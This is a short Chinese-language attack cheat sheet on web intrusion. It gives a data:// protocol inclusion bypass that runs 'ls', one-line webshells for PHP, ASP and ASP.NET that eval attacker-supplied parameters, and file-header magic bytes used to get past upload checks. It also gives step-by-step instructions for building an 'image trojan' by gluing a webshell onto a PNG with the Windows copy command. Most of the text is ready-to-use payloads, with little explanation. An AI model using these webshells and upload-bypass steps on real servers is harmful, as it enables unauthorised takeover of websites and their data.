!用后门记得开开自己的php环境 !
data协议绕过
?page=data://text/plain,<?=` ls `?>
WebShell 之常用的一句话木马:
- PHP:
<?php @eval($_POST[x]); ?>
- ASP:
<%eval request("x")%>
-
ASP.NET:
<%@ Page Language="Jscript"%><%eval (Request.Item["x"],"unsafe");%>
3.3 服务器文件内容验证-文件头:
图片格式往往不是根据文件后缀名去做判断的。文件头是文件开头的一段二进制,不同的图片类型,文件头是不同的。文件头又称文件幻数。
常见文件幻数
JPG: FF D8 FF EO 00 10 4A 46 49 46.
GIF:47 49 46 3839 61(GIF89a).
PNG:89 50 4E 47
详见:太厉害了,终于有人能把文件上传漏洞讲的明明白白了_在下小黄的博客-CSDN博客
如何生成图片木马:
注意:打开cmd,在 显示的路径 里存放好一句话木马.php和一张图片.png(或者.jpg),才能完成合成操作!
- 在路径下准备好一句话木马.php和一张图片 .png (或者 .jpg )
- 输入系统指令:
copy 一张图片.png/b+一句话木马.php/a 生成图片名称.png
- 这样图片木马就合成好了